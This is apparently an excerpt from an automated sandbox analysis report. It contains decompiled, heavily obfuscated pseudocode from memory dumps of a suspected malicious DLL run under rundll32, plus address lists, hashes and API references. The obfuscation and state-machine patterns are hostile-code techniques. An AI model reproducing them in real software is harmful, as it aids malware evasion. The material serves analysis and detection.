                                                                                                                      				_v24 = _v24 ^ 0x2ca24ccd;
                                                                                                                      				_v28 = 0xbd5c18;
                                                                                                                      				_v28 = _v28 + 0xd697;
                                                                                                                      				_v28 = _v28 ^ 0x00bf4353;
                                                                                                                      				_v32 = 0x8ab54f;
                                                                                                                      				_v32 = _v32 * 0x47;
                                                                                                                      				_v32 = _v32 ^ 0x267a3e13;
                                                                                                                      				_v88 = 0x583e0f;
                                                                                                                      				_v88 = _v88 >> 8;
                                                                                                                      				_v88 = _v88 + 0xffff5904;
                                                                                                                      				_v88 = _v88 << 0x10;
                                                                                                                      				_v88 = _v88 ^ 0xb14dc739;
                                                                                                                      				_v44 = 0x7902f;
                                                                                                                      				_v44 = _v44 + 0xffff35ef;
                                                                                                                      				_v44 = _v44 ^ 0x000a0038;
                                                                                                                      				_v64 = 0xab1413;
                                                                                                                      				_v64 = _v64 + 0xffff0fb9;
                                                                                                                      				_v64 = _v64 << 8;
                                                                                                                      				_v64 = _v64 ^ 0xaa2b0b8a;
                                                                                                                      				_v76 = 0x32b087;
                                                                                                                      				_v76 = _v76 | 0x42a79f0a;
                                                                                                                      				_v76 = _v76 ^ 0x7a54616b;
                                                                                                                      				_v76 = _v76 + 0x85;
                                                                                                                      				_v76 = _v76 ^ 0x38e777a2;
                                                                                                                      				_v20 = 0xba9969;
                                                                                                                      				_v20 = _v20 | 0x60b184e2;
                                                                                                                      				_v20 = _v20 ^ 0x60bd1ab4;
                                                                                                                      				_v52 = 0x531ceb;
                                                                                                                      				_v52 = _v52 ^ 0x8fc4675a;
                                                                                                                      				_v52 = _v52 >> 2;
                                                                                                                      				_v52 = _v52 ^ 0x23e32c7b;
                                                                                                                      				_v80 = 0xb054c0;
                                                                                                                      				_t228 = 0x5b;
                                                                                                                      				_v80 = _v80 / _t228;
                                                                                                                      				_v80 = _v80 << 1;
                                                                                                                      				_v80 = _v80 + 0xffffcecb;
                                                                                                                      				_v80 = _v80 ^ 0x0007d204;
                                                                                                                      				_v16 = 0x58f1c6;
                                                                                                                      				_v16 = _v16 ^ 0x8ee10e17;
                                                                                                                      				_v16 = _v16 ^ 0x8ebef1bd;
                                                                                                                      				_v68 = 0x312414;
                                                                                                                      				_t229 = 0x7b;
                                                                                                                      				_t233 = _v16;
                                                                                                                      				_v68 = _v68 / _t229;
                                                                                                                      				_v68 = _v68 + 0x1b34;
                                                                                                                      				_v68 = _v68 >> 2;
                                                                                                                      				_v68 = _v68 ^ 0x00095176;
                                                                                                                      				_t197 = _v16;
                                                                                                                      				_t230 = _v16;
                                                                                                                      				_v72 = 0xc0cd63;
                                                                                                                      				_v72 = _v72 | 0x9a162f11;
                                                                                                                      				_v72 = _v72 << 3;
                                                                                                                      				_v72 = _v72 * 0x12;
                                                                                                                      				_v72 = _v72 ^ 0x18eea785;
                                                                                                                      				_v48 = 0xaed007;
                                                                                                                      				_v48 = _v48 ^ 0x406d7cc3;
                                                                                                                      				_v48 = _v48 << 3;
                                                                                                                      				_v48 = _v48 ^ 0x061a7dff;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t219 = 0x5c;
                                                                                                                      					while(1) {
                                                                                                                      						L2:
                                                                                                                      						do {
                                                                                                                      							L3:
                                                                                                                      							while(_t198 != 0x2c774a6) {
                                                                                                                      								if(_t198 == 0x3d69ab1) {
                                                                                                                      									_t198 = 0x526c216;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t198 == 0x4efcef6) {
                                                                                                                      										E0018E689(_v76, _v20, _v52, _t233, _v80);
                                                                                                                      										_t234 =  &(_t234[3]);
                                                                                                                      										_t198 = 0x2c774a6;
                                                                                                                      										goto L1;
                                                                                                                      									} else {
                                                                                                                      										if(_t198 == 0x526c216) {
                                                                                                                      											_t231 =  *0x19520c; // 0x0
                                                                                                                      											_t232 = _t231 + 0x220;
                                                                                                                      											while( *_t232 != _t219) {
                                                                                                                      												_t232 = _t232 + 2;
                                                                                                                      											}
                                                                                                                      											_t230 = _t232 + 2;
                                                                                                                      											_t198 = 0xb318200;
                                                                                                                      											goto L2;
                                                                                                                      										} else {
                                                                                                                      											if(_t198 == 0x54b01d8) {
                                                                                                                      												_t193 = E00172E96(_v56, _v24, _v28, _v60, _v32, _t230, _t197);
                                                                                                                      												_t234 =  &(_t234[5]);
                                                                                                                      												_t233 = _t193;
                                                                                                                      												_t191 = 0xe4f0407;
                                                                                                                      												_t198 =  !=  ? 0xe4f0407 : 0x2c774a6;
                                                                                                                      												_t219 = 0x5c;
                                                                                                                      												continue;
                                                                                                                      											} else {
                                                                                                                      												if(_t198 == 0xb318200) {
                                                                                                                      													_t194 = E0017EB36(_v84, _v36, _t198, _v40);
                                                                                                                      													_t197 = _t194;
                                                                                                                      													_t234 =  &(_t234[3]);
                                                                                                                      													if(_t194 != 0) {
                                                                                                                      														_t198 = 0x54b01d8;
                                                                                                                      														while(1) {
                                                                                                                      															L1:
                                                                                                                      															_t219 = 0x5c;
                                                                                                                      															goto L2;
                                                                                                                      														}
                                                                                                                      													}
                                                                                                                      												} else {
                                                                                                                      													if(_t198 != _t191) {
                                                                                                                      														goto L21;
                                                                                                                      													} else {
                                                                                                                      														E0017C67D(_t233, _v88, _v44, _v64);
                                                                                                                      														_t224 =  !=  ? 1 : _t224;
                                                                                                                      														_t198 = 0x4efcef6;
                                                                                                                      														while(1) {
                                                                                                                      															L1:
                                                                                                                      															_t219 = 0x5c;
                                                                                                                      															L2:
                                                                                                                      															goto L3;
                                                                                                                      														}
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								goto L22;
                                                                                                                      							}
                                                                                                                      							E0018E689(_v16, _v68, _v72, _t197, _v48);
                                                                                                                      							_t234 =  &(_t234[3]);
                                                                                                                      							_t198 = 0xc9e12b8;
                                                                                                                      							_t191 = 0xe4f0407;
                                                                                                                      							_t219 = 0x5c;
                                                                                                                      							L21:
                                                                                                                      						} while (_t198 != 0xc9e12b8);
                                                                                                                      						L22:
                                                                                                                      						return _t224;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x00180814
                                                                                                                      0x0018081a
                                                                                                                      0x00180825
                                                                                                                      0x00180822
                                                                                                                      0x00180822
                                                                                                                      0x0018082a
                                                                                                                      0x0018082d
                                                                                                                      0x00000000
                                                                                                                      0x00180778
                                                                                                                      0x0018077e
                                                                                                                      0x001807f3
                                                                                                                      0x001807f8
                                                                                                                      0x001807fb
                                                                                                                      0x00180804
                                                                                                                      0x00180809
                                                                                                                      0x0018080e
                                                                                                                      0x00000000
                                                                                                                      0x00180780
                                                                                                                      0x00180786
                                                                                                                      0x001807c1
                                                                                                                      0x001807c6
                                                                                                                      0x001807c8
                                                                                                                      0x001807cd
                                                                                                                      0x001807d3
                                                                                                                      0x00180740
                                                                                                                      0x00180740
                                                                                                                      0x00180742
                                                                                                                      0x00000000
                                                                                                                      0x00180742
                                                                                                                      0x00180740
                                                                                                                      0x00180788
                                                                                                                      0x0018078a
                                                                                                                      0x00000000
                                                                                                                      0x00180790
                                                                                                                      0x0018079e
                                                                                                                      0x001807aa
                                                                                                                      0x001807ad
                                                                                                                      0x00180740
                                                                                                                      0x00180740
                                                                                                                      0x00180742
                                                                                                                      0x00180743
                                                                                                                      0x00000000
                                                                                                                      0x00180743
                                                                                                                      0x00180740
                                                                                                                      0x0018078a
                                                                                                                      0x00180786
                                                                                                                      0x0018077e
                                                                                                                      0x00180772
                                                                                                                      0x00180766
                                                                                                                      0x00000000
                                                                                                                      0x0018075a
                                                                                                                      0x00180875
                                                                                                                      0x0018087a
                                                                                                                      0x0018087d
                                                                                                                      0x00180882
                                                                                                                      0x00180889
                                                                                                                      0x0018088a
                                                                                                                      0x0018088a
                                                                                                                      0x00180896
                                                                                                                      0x0018089f
                                                                                                                      0x0018089f
                                                                                                                      0x00180743

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8$CLN$`"$kaTz$ln$vQ${,#
                                                                                                                      • API String ID: 0-3310206870
                                                                                                                      • Opcode ID: 04aa30f25a01d8f4f12d298d790cf49d581afdfcd6b71565313c5ac54d3de3b9
                                                                                                                      • Instruction ID: 2dbce8b1c3a603c73b195e32775db517be2bb3cf9740ece6c0af27942a74932a
                                                                                                                      • Opcode Fuzzy Hash: 04aa30f25a01d8f4f12d298d790cf49d581afdfcd6b71565313c5ac54d3de3b9
                                                                                                                      • Instruction Fuzzy Hash: DCA165715083459FC399DF65C88981BFBF1FBD8358F10891DF59A96260D3B18A498F82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _strcpy_s.LIBCMT ref: 10014B9E
                                                                                                                        • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                      • __snprintf_s.LIBCMT ref: 10014BD7
                                                                                                                        • Part of subcall function 1003119A: __vsnprintf_s_l.LIBCMT ref: 100311AF
                                                                                                                      • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10014C02
                                                                                                                      • LoadLibraryA.KERNEL32(?), ref: 10014C25
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                                      • String ID: LOC
                                                                                                                      • API String ID: 3864805678-519433814
                                                                                                                      • Opcode ID: 63ab523a9a2e3d371aaeed16ad9493fb6f1cf84d76bfa06aab66571a3b8646f3
                                                                                                                      • Instruction ID: 7277114792b78e9780c732931990dc2d47c5509fa80221895377f97ab4224877
                                                                                                                      • Opcode Fuzzy Hash: 63ab523a9a2e3d371aaeed16ad9493fb6f1cf84d76bfa06aab66571a3b8646f3
                                                                                                                      • Instruction Fuzzy Hash: B711E171900118AFDB12DB64CC46BDD73B8EF09315F1241A1F7059F0A2EEB0EA869AD1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E00189186(void* __ecx, void* __edx, intOrPtr _a8) {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				signed int _v1564;
                                                                                                                      				signed int _v1568;
                                                                                                                      				signed int _v1572;
                                                                                                                      				signed int _v1576;
                                                                                                                      				signed int _v1580;
                                                                                                                      				signed int _v1584;
                                                                                                                      				signed int _v1588;
                                                                                                                      				signed int _v1592;
                                                                                                                      				signed int _v1596;
                                                                                                                      				signed int _v1600;
                                                                                                                      				signed int _v1604;
                                                                                                                      				signed int _v1608;
                                                                                                                      				signed int _v1612;
                                                                                                                      				signed int _v1616;
                                                                                                                      				signed int _v1620;
                                                                                                                      				signed int _v1624;
                                                                                                                      				signed int _v1628;
                                                                                                                      				signed int _v1632;
                                                                                                                      				signed int _v1636;
                                                                                                                      				signed int _v1640;
                                                                                                                      				signed int _v1644;
                                                                                                                      				signed int _v1648;
                                                                                                                      				signed int _v1652;
                                                                                                                      				signed int _v1656;
                                                                                                                      				signed int _v1660;
                                                                                                                      				signed int _v1664;
                                                                                                                      				signed int _v1668;
                                                                                                                      				signed int _v1672;
                                                                                                                      				signed int _v1676;
                                                                                                                      				signed int _v1680;
                                                                                                                      				signed int _v1684;
                                                                                                                      				signed int _v1688;
                                                                                                                      				signed int _v1692;
                                                                                                                      				signed int _v1696;
                                                                                                                      				signed int _v1700;
                                                                                                                      				signed int _v1704;
                                                                                                                      				void* _t336;
                                                                                                                      				void* _t361;
                                                                                                                      				intOrPtr _t365;
                                                                                                                      				intOrPtr _t367;
                                                                                                                      				void* _t371;
                                                                                                                      				intOrPtr _t373;
                                                                                                                      				intOrPtr _t376;
                                                                                                                      				void* _t386;
                                                                                                                      				void* _t425;
                                                                                                                      				signed int _t426;
                                                                                                                      				signed int _t427;
                                                                                                                      				signed int _t428;
                                                                                                                      				signed int _t429;
                                                                                                                      				signed int _t430;
                                                                                                                      				signed int _t431;
                                                                                                                      				signed int _t432;
                                                                                                                      				signed int _t433;
                                                                                                                      				signed int _t434;
                                                                                                                      				signed int* _t439;
                                                                                                                      
                                                                                                                      				_push(_a8);
                                                                                                                      				_t425 = 0;
                                                                                                                      				_push(0);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0017CF25(_t336);
                                                                                                                      				_v1592 = 0xe90366;
                                                                                                                      				_t439 =  &(( &_v1704)[4]);
                                                                                                                      				_v1592 = _v1592 | 0xd8b262de;
                                                                                                                      				_v1592 = _v1592 ^ 0xd8fb63d7;
                                                                                                                      				_t386 = 0x283f0d8;
                                                                                                                      				_v1624 = 0xa39629;
                                                                                                                      				_v1624 = _v1624 >> 4;
                                                                                                                      				_t426 = 0x2c;
                                                                                                                      				_v1624 = _v1624 / _t426;
                                                                                                                      				_v1624 = _v1624 ^ 0x000bae79;
                                                                                                                      				_v1600 = 0xef5a7d;
                                                                                                                      				_t19 =  &_v1600; // 0xef5a7d
                                                                                                                      				_t427 = 0x1f;
                                                                                                                      				_v1600 =  *_t19 / _t427;
                                                                                                                      				_v1600 = _v1600 ^ 0x000c380d;
                                                                                                                      				_v1568 = 0xec630a;
                                                                                                                      				_t28 =  &_v1568; // 0xec630a
                                                                                                                      				_t428 = 0x1c;
                                                                                                                      				_v1568 =  *_t28 / _t428;
                                                                                                                      				_v1568 = _v1568 ^ 0x0002d50e;
                                                                                                                      				_v1668 = 0x697ac4;
                                                                                                                      				_v1668 = _v1668 ^ 0x43408629;
                                                                                                                      				_v1668 = _v1668 << 4;
                                                                                                                      				_v1668 = _v1668 << 0xf;
                                                                                                                      				_v1668 = _v1668 ^ 0xe763f227;
                                                                                                                      				_v1692 = 0xf5db19;
                                                                                                                      				_v1692 = _v1692 ^ 0xaa29ad2f;
                                                                                                                      				_v1692 = _v1692 >> 0xe;
                                                                                                                      				_v1692 = _v1692 << 6;
                                                                                                                      				_v1692 = _v1692 ^ 0x00a75d57;
                                                                                                                      				_v1620 = 0x9b43e;
                                                                                                                      				_v1620 = _v1620 >> 0xa;
                                                                                                                      				_v1620 = _v1620 + 0x190a;
                                                                                                                      				_v1620 = _v1620 ^ 0x0005a1ac;
                                                                                                                      				_v1572 = 0xd92c9a;
                                                                                                                      				_v1572 = _v1572 << 0xc;
                                                                                                                      				_v1572 = _v1572 ^ 0x92c3ac8e;
                                                                                                                      				_v1700 = 0x6f30ff;
                                                                                                                      				_v1700 = _v1700 << 0xe;
                                                                                                                      				_t429 = 0x26;
                                                                                                                      				_v1700 = _v1700 / _t429;
                                                                                                                      				_v1700 = _v1700 >> 0xe;
                                                                                                                      				_v1700 = _v1700 ^ 0x0006fa3f;
                                                                                                                      				_v1684 = 0x78d9c1;
                                                                                                                      				_v1684 = _v1684 * 0x25;
                                                                                                                      				_v1684 = _v1684 | 0x77a8ffeb;
                                                                                                                      				_v1684 = _v1684 ^ 0x77fd8a30;
                                                                                                                      				_v1656 = 0xa4e4c6;
                                                                                                                      				_v1656 = _v1656 + 0xa942;
                                                                                                                      				_v1656 = _v1656 + 0xffff73ad;
                                                                                                                      				_v1656 = _v1656 ^ 0x00a1f1ac;
                                                                                                                      				_v1652 = 0x64ed51;
                                                                                                                      				_v1652 = _v1652 >> 0xf;
                                                                                                                      				_v1652 = _v1652 * 0x5c;
                                                                                                                      				_v1652 = _v1652 ^ 0x00034dfd;
                                                                                                                      				_v1580 = 0x83183a;
                                                                                                                      				_v1580 = _v1580 ^ 0x32eb2c8f;
                                                                                                                      				_v1580 = _v1580 ^ 0x326d5fbf;
                                                                                                                      				_v1564 = 0x95c9ec;
                                                                                                                      				_v1564 = _v1564 >> 6;
                                                                                                                      				_v1564 = _v1564 ^ 0x0008f372;
                                                                                                                      				_v1588 = 0xb1660f;
                                                                                                                      				_v1588 = _v1588 + 0x4492;
                                                                                                                      				_v1588 = _v1588 ^ 0x00bbacbc;
                                                                                                                      				_v1676 = 0x88aa71;
                                                                                                                      				_v1676 = _v1676 << 0xd;
                                                                                                                      				_v1676 = _v1676 | 0x03baa1bf;
                                                                                                                      				_v1676 = _v1676 << 6;
                                                                                                                      				_v1676 = _v1676 ^ 0xffa89651;
                                                                                                                      				_v1632 = 0x868f26;
                                                                                                                      				_v1632 = _v1632 << 1;
                                                                                                                      				_v1632 = _v1632 + 0xffffb6b3;
                                                                                                                      				_v1632 = _v1632 ^ 0x010eb46f;
                                                                                                                      				_v1640 = 0xd64df9;
                                                                                                                      				_v1640 = _v1640 >> 6;
                                                                                                                      				_t430 = 0x32;
                                                                                                                      				_v1640 = _v1640 / _t430;
                                                                                                                      				_v1640 = _v1640 ^ 0x000ccd63;
                                                                                                                      				_v1664 = 0x22c79e;
                                                                                                                      				_t431 = 0xf;
                                                                                                                      				_v1664 = _v1664 * 9;
                                                                                                                      				_v1664 = _v1664 << 0xa;
                                                                                                                      				_v1664 = _v1664 ^ 0x4da35e74;
                                                                                                                      				_v1664 = _v1664 ^ 0xa9bd4987;
                                                                                                                      				_v1696 = 0xf7f994;
                                                                                                                      				_v1696 = _v1696 >> 0xf;
                                                                                                                      				_v1696 = _v1696 << 7;
                                                                                                                      				_v1696 = _v1696 + 0xffff3f9d;
                                                                                                                      				_v1696 = _v1696 ^ 0x000a4602;
                                                                                                                      				_v1648 = 0xefbcda;
                                                                                                                      				_v1648 = _v1648 | 0xaae2c2a8;
                                                                                                                      				_v1648 = _v1648 + 0x86a3;
                                                                                                                      				_v1648 = _v1648 ^ 0xaafdd76e;
                                                                                                                      				_v1680 = 0x28593a;
                                                                                                                      				_v1680 = _v1680 >> 4;
                                                                                                                      				_v1680 = _v1680 | 0x0bfc0be2;
                                                                                                                      				_v1680 = _v1680 + 0x55be;
                                                                                                                      				_v1680 = _v1680 ^ 0x0bf8c584;
                                                                                                                      				_v1596 = 0xd047d1;
                                                                                                                      				_v1596 = _v1596 | 0xaa1708a2;
                                                                                                                      				_v1596 = _v1596 ^ 0xaad8bb32;
                                                                                                                      				_v1604 = 0xf2c56f;
                                                                                                                      				_v1604 = _v1604 << 6;
                                                                                                                      				_v1604 = _v1604 ^ 0x3cb75693;
                                                                                                                      				_v1644 = 0x36719;
                                                                                                                      				_v1644 = _v1644 ^ 0x56bc0977;
                                                                                                                      				_t432 = 7;
                                                                                                                      				_v1644 = _v1644 / _t431;
                                                                                                                      				_v1644 = _v1644 ^ 0x05c6baf7;
                                                                                                                      				_v1672 = 0x1a4ba5;
                                                                                                                      				_v1672 = _v1672 << 2;
                                                                                                                      				_v1672 = _v1672 / _t432;
                                                                                                                      				_v1672 = _v1672 >> 2;
                                                                                                                      				_v1672 = _v1672 ^ 0x0008f53b;
                                                                                                                      				_v1628 = 0xe04a84;
                                                                                                                      				_v1628 = _v1628 | 0x71ddf7de;
                                                                                                                      				_v1628 = _v1628 + 0xd6a7;
                                                                                                                      				_v1628 = _v1628 ^ 0x71f84a11;
                                                                                                                      				_v1688 = 0xb42ba6;
                                                                                                                      				_t433 = 0x24;
                                                                                                                      				_v1688 = _v1688 / _t433;
                                                                                                                      				_v1688 = _v1688 | 0x51e7f8f6;
                                                                                                                      				_v1688 = _v1688 << 0xb;
                                                                                                                      				_v1688 = _v1688 ^ 0x3fc44495;
                                                                                                                      				_v1704 = 0x876d58;
                                                                                                                      				_v1704 = _v1704 + 0x4bbd;
                                                                                                                      				_v1704 = _v1704 ^ 0xe392f1ca;
                                                                                                                      				_v1704 = _v1704 << 5;
                                                                                                                      				_v1704 = _v1704 ^ 0x62a598c6;
                                                                                                                      				_v1636 = 0x545e02;
                                                                                                                      				_v1636 = _v1636 + 0xcb63;
                                                                                                                      				_v1636 = _v1636 << 5;
                                                                                                                      				_v1636 = _v1636 ^ 0x0aae6d2b;
                                                                                                                      				_v1612 = 0x26c885;
                                                                                                                      				_v1612 = _v1612 | 0x5f90e8de;
                                                                                                                      				_t434 = 0x66;
                                                                                                                      				_v1612 = _v1612 * 0x52;
                                                                                                                      				_v1612 = _v1612 ^ 0xa89ce640;
                                                                                                                      				_v1576 = 0x171d42;
                                                                                                                      				_v1576 = _v1576 ^ 0x4acb7e15;
                                                                                                                      				_v1576 = _v1576 ^ 0x4adecc08;
                                                                                                                      				_v1660 = 0xcbbc2;
                                                                                                                      				_v1660 = _v1660 >> 8;
                                                                                                                      				_v1660 = _v1660 / _t434;
                                                                                                                      				_v1660 = _v1660 ^ 0x3398a9eb;
                                                                                                                      				_v1660 = _v1660 ^ 0x33921795;
                                                                                                                      				_v1608 = 0x5e75bf;
                                                                                                                      				_v1608 = _v1608 + 0xa7f5;
                                                                                                                      				_v1608 = _v1608 >> 1;
                                                                                                                      				_v1608 = _v1608 ^ 0x002982b8;
                                                                                                                      				_v1584 = 0x10acd4;
                                                                                                                      				_v1584 = _v1584 + 0x75ec;
                                                                                                                      				_v1584 = _v1584 ^ 0x001a134d;
                                                                                                                      				_v1616 = 0x7387ff;
                                                                                                                      				_v1616 = _v1616 | 0x122d515f;
                                                                                                                      				_v1616 = _v1616 + 0xffffa5db;
                                                                                                                      				_v1616 = _v1616 ^ 0x12702e1c;
                                                                                                                      				L1:
                                                                                                                      				while(_t386 != 0x283f0d8) {
                                                                                                                      					if(_t386 == 0xc593167) {
                                                                                                                      						_push(_v1700);
                                                                                                                      						_push(_v1572);
                                                                                                                      						_push(0x1710fc);
                                                                                                                      						_t361 = E0017AB66(_v1692, _v1620, __eflags);
                                                                                                                      						E0018C66E( &_v1560, __eflags);
                                                                                                                      						_t365 =  *0x19520c; // 0x0
                                                                                                                      						_t367 =  *0x19520c; // 0x0
                                                                                                                      						E0018BDB5( &_v520, __eflags, _v1684, _v1656, _v1652, _v1580, _t367 + 0x220, _v1564, _v1588, _t365 + 8,  &_v1560,  &_v1040, _t361);
                                                                                                                      						E0017AE03(_v1676, _v1632, _v1640, _t361);
                                                                                                                      						_t439 =  &(_t439[0x10]);
                                                                                                                      						L8:
                                                                                                                      						_t386 = 0xe92714c;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t386 == 0xd2f347e) {
                                                                                                                      						_push(_v1680);
                                                                                                                      						_push(_v1648);
                                                                                                                      						_push(0x17121c);
                                                                                                                      						_t371 = E0017AB66(_v1664, _v1696, __eflags);
                                                                                                                      						E0018C66E( &_v1560, __eflags);
                                                                                                                      						_t373 =  *0x19520c; // 0x0
                                                                                                                      						_t376 =  *0x19520c; // 0x0
                                                                                                                      						__eflags = 0;
                                                                                                                      						E00175F83(_v1596, 0, _v1604,  &_v520,  &_v1560, _v1644, _v1672,  &_v1560, _t376 + 0x220, _v1628,  &_v1040, _t373 + 8, _v1688, _t371);
                                                                                                                      						E0017AE03(_v1704, _v1636, _v1612, _t371);
                                                                                                                      						_t439 =  &(_t439[0x11]);
                                                                                                                      						goto L8;
                                                                                                                      					}
                                                                                                                      					if(_t386 == 0xe92714c) {
                                                                                                                      						_push(_v1616);
                                                                                                                      						_push(_v1584);
                                                                                                                      						_push(_v1608);
                                                                                                                      						_push(_t425);
                                                                                                                      						_push(_t425);
                                                                                                                      						_push(_v1660);
                                                                                                                      						_push(_t386);
                                                                                                                      						_push(_t425);
                                                                                                                      						__eflags = E00179700( &_v520, _v1576, __eflags);
                                                                                                                      						_t425 =  !=  ? 1 : _t425;
                                                                                                                      					} else {
                                                                                                                      						if(_t386 != 0x3c91f62) {
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t425;
                                                                                                                      				}
                                                                                                                      				_push(_t386);
                                                                                                                      				E0017EA7B( &_v1040, _v1624, _v1592, _t386, _v1600, _v1568, _v1668);
                                                                                                                      				_t439 =  &(_t439[7]);
                                                                                                                      				_t386 = 0xc593167;
                                                                                                                      				goto L1;
                                                                                                                      			}
                                                                                                                      0x00189321
                                                                                                                      0x00189329
                                                                                                                      0x00189333
                                                                                                                      0x00189337
                                                                                                                      0x0018933f
                                                                                                                      0x0018934c
                                                                                                                      0x00189357
                                                                                                                      0x00189362
                                                                                                                      0x0018936d
                                                                                                                      0x00189375
                                                                                                                      0x00189380
                                                                                                                      0x0018938b
                                                                                                                      0x00189396
                                                                                                                      0x001893a1
                                                                                                                      0x001893a9
                                                                                                                      0x001893ae
                                                                                                                      0x001893b6
                                                                                                                      0x001893bb
                                                                                                                      0x001893c3
                                                                                                                      0x001893cb
                                                                                                                      0x001893cf
                                                                                                                      0x001893d7
                                                                                                                      0x001893df
                                                                                                                      0x001893e7
                                                                                                                      0x001893f2
                                                                                                                      0x001893f7
                                                                                                                      0x001893fd
                                                                                                                      0x00189405
                                                                                                                      0x00189412
                                                                                                                      0x00189415
                                                                                                                      0x00189419
                                                                                                                      0x0018941e
                                                                                                                      0x00189426
                                                                                                                      0x0018942e
                                                                                                                      0x00189436
                                                                                                                      0x0018943b
                                                                                                                      0x00189440
                                                                                                                      0x00189448
                                                                                                                      0x00189450
                                                                                                                      0x00189458
                                                                                                                      0x00189460
                                                                                                                      0x00189468
                                                                                                                      0x00189470
                                                                                                                      0x00189478
                                                                                                                      0x0018947d
                                                                                                                      0x00189485
                                                                                                                      0x0018948d
                                                                                                                      0x00189495
                                                                                                                      0x001894a0
                                                                                                                      0x001894ab
                                                                                                                      0x001894b6
                                                                                                                      0x001894be
                                                                                                                      0x001894c3
                                                                                                                      0x001894cb
                                                                                                                      0x001894d3
                                                                                                                      0x001894e1
                                                                                                                      0x001894e2
                                                                                                                      0x001894e8
                                                                                                                      0x001894f0
                                                                                                                      0x001894f8
                                                                                                                      0x00189505
                                                                                                                      0x00189509
                                                                                                                      0x0018950e
                                                                                                                      0x00189516
                                                                                                                      0x0018951e
                                                                                                                      0x00189526
                                                                                                                      0x0018952e
                                                                                                                      0x00189538
                                                                                                                      0x00189544
                                                                                                                      0x00189549
                                                                                                                      0x0018954f
                                                                                                                      0x0018955c
                                                                                                                      0x00189566
                                                                                                                      0x0018956e
                                                                                                                      0x00189576
                                                                                                                      0x0018957e
                                                                                                                      0x00189586
                                                                                                                      0x0018958b
                                                                                                                      0x00189593
                                                                                                                      0x0018959b
                                                                                                                      0x001895a3
                                                                                                                      0x001895a8
                                                                                                                      0x001895b0
                                                                                                                      0x001895b8
                                                                                                                      0x001895c5
                                                                                                                      0x001895c6
                                                                                                                      0x001895ca
                                                                                                                      0x001895d2
                                                                                                                      0x001895dd
                                                                                                                      0x001895e8
                                                                                                                      0x001895f3
                                                                                                                      0x001895fb
                                                                                                                      0x00189606
                                                                                                                      0x0018960a
                                                                                                                      0x00189612
                                                                                                                      0x0018961a
                                                                                                                      0x00189622
                                                                                                                      0x0018962a
                                                                                                                      0x0018962e
                                                                                                                      0x00189636
                                                                                                                      0x00189641
                                                                                                                      0x0018964c
                                                                                                                      0x00189657
                                                                                                                      0x0018965f
                                                                                                                      0x00189667
                                                                                                                      0x0018966f
                                                                                                                      0x00000000
                                                                                                                      0x00189677
                                                                                                                      0x00189685
                                                                                                                      0x00189748
                                                                                                                      0x0018974c
                                                                                                                      0x0018975b
                                                                                                                      0x00189760
                                                                                                                      0x0018976e
                                                                                                                      0x00189789
                                                                                                                      0x001897a7
                                                                                                                      0x001897c5
                                                                                                                      0x001897dd
                                                                                                                      0x001897e2
                                                                                                                      0x00189741
                                                                                                                      0x00189741
                                                                                                                      0x00000000
                                                                                                                      0x00189741
                                                                                                                      0x00189691
                                                                                                                      0x001896a8
                                                                                                                      0x001896ac
                                                                                                                      0x001896b8
                                                                                                                      0x001896bd
                                                                                                                      0x001896ce
                                                                                                                      0x001896d8
                                                                                                                      0x001896ed
                                                                                                                      0x0018971f
                                                                                                                      0x00189721
                                                                                                                      0x00189739
                                                                                                                      0x0018973e
                                                                                                                      0x00000000
                                                                                                                      0x0018973e
                                                                                                                      0x00189695
                                                                                                                      0x0018981f
                                                                                                                      0x00189823
                                                                                                                      0x0018982a
                                                                                                                      0x0018982e
                                                                                                                      0x0018982f
                                                                                                                      0x00189830
                                                                                                                      0x0018983b
                                                                                                                      0x0018983c
                                                                                                                      0x0018984f
                                                                                                                      0x00189851
                                                                                                                      0x0018969b
                                                                                                                      0x001896a1
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x001896a3
